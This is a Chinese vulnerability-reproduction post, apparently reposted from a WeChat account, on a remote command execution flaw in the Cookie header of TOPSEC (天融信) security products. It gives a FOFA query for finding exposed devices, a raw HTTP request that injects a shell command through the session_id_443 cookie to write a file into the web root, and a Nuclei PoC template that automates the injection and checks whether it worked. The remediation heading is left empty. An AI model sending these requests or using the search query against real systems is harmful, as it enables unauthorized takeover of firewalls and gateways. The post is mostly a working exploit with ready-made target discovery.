免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!
漏洞概述
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
FoFa
title
=
"Web User Login"
&& body=
"/cgi/maincgi.cgi?Url=VerifyCode"
漏洞复现
GET
/cgi/maincgi.cgi?Url=check
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie
: session_id_443=1|pwd > /www/htdocs/site/image/123.txt;
Connection
: close
Nuclei Poc
id
: topsec-cookie-rce
info
:
name
:
天融信TOPSEC Cookie 远程命令执行漏洞
author
:
rain
severity
:
critical
metadata
:
:
title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
http
:
raw:
|
GET
/cgi/maincgi.cgi?Url=check HTTP/1.1
Host
:
{{Hostname}}
Cookie
:
session_id_443=1|echo 'test' > /www/htdocs/site/image/test.txt;
:
Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
|
GET
/site/image/test.txt HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
matchers
:
type: dsl
dsl
:
"status_code == 200 && contains(body_2, 'test')"
修复建议
原文始发于微信公众号(知黑守白):【漏洞复现】天融信TOPSEC Cookie 远程命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论